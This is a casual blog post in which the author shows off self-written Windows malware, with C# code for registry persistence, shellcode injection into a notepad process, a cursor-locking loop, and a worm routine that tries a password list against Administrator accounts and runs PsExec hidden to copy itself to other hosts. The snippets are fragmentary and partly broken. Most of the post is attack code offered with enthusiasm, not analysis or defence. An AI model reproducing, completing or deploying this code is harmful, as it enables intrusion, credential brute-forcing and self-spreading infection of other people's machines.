finishing up some malware!!!
posted on : 7/13/2024
helllo evertt1 today i bring you. finihsed
malware. i love malwre!!! anwaaays it can be
. do go visit, give me a star, repsot, reblog!!!
idk. anyways lets get into what it odes!
here are the steps in the program!!
step 1: it writes itself to the registry to run
on boot
step 2: it will open notepad as a process and
then inject shellcode to spawn a messagebox
step 3: it attempts to spread itself to other
step 4: finally, it will lock the cursor in
place and prevent users from moving it around.
some code analysis!
some of my more proud parts are this:
static bool UnsfInj(IntPtr h)
IntPtr memAlloc = VirtualAllocEx(h, IntPtr.Zero, Buf.Length, 0x00001000, 0x40);
UIntPtr outout;
WriteProcessMemory(h, memAlloc , Buf, (uint)(Buf.Length), out outout);
if (CreateRemoteThread(h, IntPtr.Zero, 0, memAlloc , IntPtr.Zero, 0,IntPtr.Zero) != IntPtr.Zero)
Console.Write("injection complete!");
return true;
Console.Write("injection failed");
return false;
this function injects shellcode which i think is
just amwazing....i lvoe shellcode make some
here's how i locked the cursor. its shrimple.
while (1==1)
Console.SetCursorPosition(0,0 );
if (Console.ReadKey().Key != ConsoleKey.K && Console.ReadKey().Key != ConsoleKey.Enter)
the break is in tehre for testing purposes. i am
stilll testing this mofo. tring to get a
environment where i can bc my virutal machines
hate me.
okay next is some misc piexes thati loved
private static async Task (carat) bool Spread(List string adrs, IEnumerable string pwl, string path)
using (TcpClient tcl = new TcpClient ())
for (int i = 0; i = adrs.Count; i++)
byte[] bytes = Encoding.ASCII.GetBytes(adrs[i]);
IPAddress nadr = new IPAddress(bytes);
IPEndPoint edp = new IPEndPoint(nadr, 135);
await tcl.ConnectAsync(edp);
foreach (string line in pwl)
string arguments = $@"\\{adrs[i]} -u Administrator -p {line} -c -csrc ""{path} gigas.exe";
ProcessStartInfo psi = new ProcessStartInfo
FileName = "C:\\Windows\\System32\\PsExec.exe",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
using (Process proc = Process.Start(psi))
return true;
return false;
i hearted this part!! it spwawns psedxec :3
anyways tahts all for now gootbye. tune in later
when i recode this into rust or go (vote in the
cmtts belowwww)